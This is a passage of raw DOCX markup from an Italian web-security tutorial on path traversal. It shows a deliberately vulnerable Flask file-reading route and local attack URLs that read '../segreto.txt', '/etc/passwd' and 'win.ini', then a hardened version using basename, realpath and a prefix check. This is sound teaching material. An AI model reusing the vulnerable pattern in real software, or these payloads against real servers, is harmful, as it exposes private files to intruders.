          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> request.args.get(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"doc"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"termini.txt"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    percorso </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">f"documenti/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">nome</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialString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(percorso,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contenuto </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> f.read()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">f"&lt;pre&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">contenuto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/pre&gt;"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f"Errore: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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">404</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Riavvia l’app.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="420"/>
    <w:bookmarkStart w:id="421" w:name="verifica-del-comportamento-normale-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Verifica del comportamento normale</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vai su</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId60">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000/leggi?doc=termini.txt</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">. Vedi i termini.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vai su</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId61">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000/leggi?doc=privacy.txt</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">. Vedi la privacy.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="421"/>
    <w:bookmarkStart w:id="422" w:name="lattacco-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’attacco</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vai su:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:hyperlink r:id="rId62">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000/leggi?doc=../segreto.txt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vedi:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Chiave segreta del CEO: SUPER-SEGRETO-123</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Path Traversal con un solo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">..</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Adesso prova un colpo più ambizioso. Su Linux/macOS:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:hyperlink r:id="rId63">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000/leggi?doc=../../../../etc/passwd</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vedi il contenuto di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(lista degli utenti del sistema operativo). Su Windows un equivalente potrebbe essere</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">../../../../Windows/win.ini</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">📷</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Screenshot:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">la pagina mostra il contenuto di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— username, shell, home directory di tutti gli utenti del sistema operativo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5669280" cy="3401568"/>
            <wp:docPr id="17" name="Picture 17"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="screenshot_17_la_pagina_mostra_il_contenuto_di_etc_passwd_username_shell_h.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669280" cy="3401568"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="422"/>
    <w:bookmarkStart w:id="423" w:name="correzione-3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Correzione</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sostituisci la funzione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">leggi()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con la versione sicura (tre difese sovrapposte):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> os</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">CARTELLA_DOCUMENTI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> os.path.realpath(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"documenti"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ESTENSIONI_AMMESSE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">".txt"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">".pdf"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">@app.route</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"/leggi"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> leggi():</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    nome </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> os.path.basename(request.args.get(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"doc"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"termini.txt"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    estensione </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> os.path.splitext(nome)[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">].lower()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> estensione </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ESTENSIONI_AMMESSE:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        abort(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">403</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    percorso_proposto </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> os.path.join(CARTELLA_DOCUMENTI, nome)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    percorso_reale </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> os.path.realpath(percorso_proposto)</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percorso_reale.startswith(CARTELLA_DOCUMENTI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> os.sep):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        abort(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">403</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(percorso_reale,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contenuto </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> f.read()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">f"&lt;pre&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">contenuto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/pre&gt;"</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abort(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">404</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Riavvia. Riprova:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1153"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">?doc=termini.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ funziona</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1153"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">?doc=../segreto.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ 403 Forbidden</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1153"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">?doc=../../../../etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ 403 Forbidden</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Hai chiuso Path Traversal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="423"/>
    <w:bookmarkEnd w:id="424"/>
    <w:bookmarkStart w:id="425" w:name="errori-comuni"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="568" w:name="sec_10_4"/>
      <w:r>
        <w:t xml:space="preserve">10.4 Errori comuni</w:t>
      </w:r>
      <w:bookmarkEnd w:id="568"/>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Errore</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Conseguenza</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Correzione</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Concatenazione diretta di input nel percorso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Path traversal totale</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">basename</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">+</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">realpath</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">+ verifica prefisso</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Solo</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">basename</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, senza verifica prefisso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Bypass via symlink</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Aggiungere</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">realpath</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">+ check</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Filtro testuale di</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
